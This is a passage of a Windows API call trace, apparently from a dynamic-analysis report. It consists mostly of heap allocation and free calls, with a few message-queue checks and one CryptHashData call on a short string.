(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0249.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0249.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e88 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0249.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0249.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0249.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ec8 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54df8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0249.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.391] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0249.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0249.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0249.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e517a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0249.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.393] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0249.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.393] CryptHashData (hHash=0xa876d0, pbData=0x2e54e88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0249.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0249.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.394] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0249.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0249.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0249.395] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.395] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0249.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0249.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0249.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0249.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0249.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0249.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0249.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0249.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0249.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0249.397] 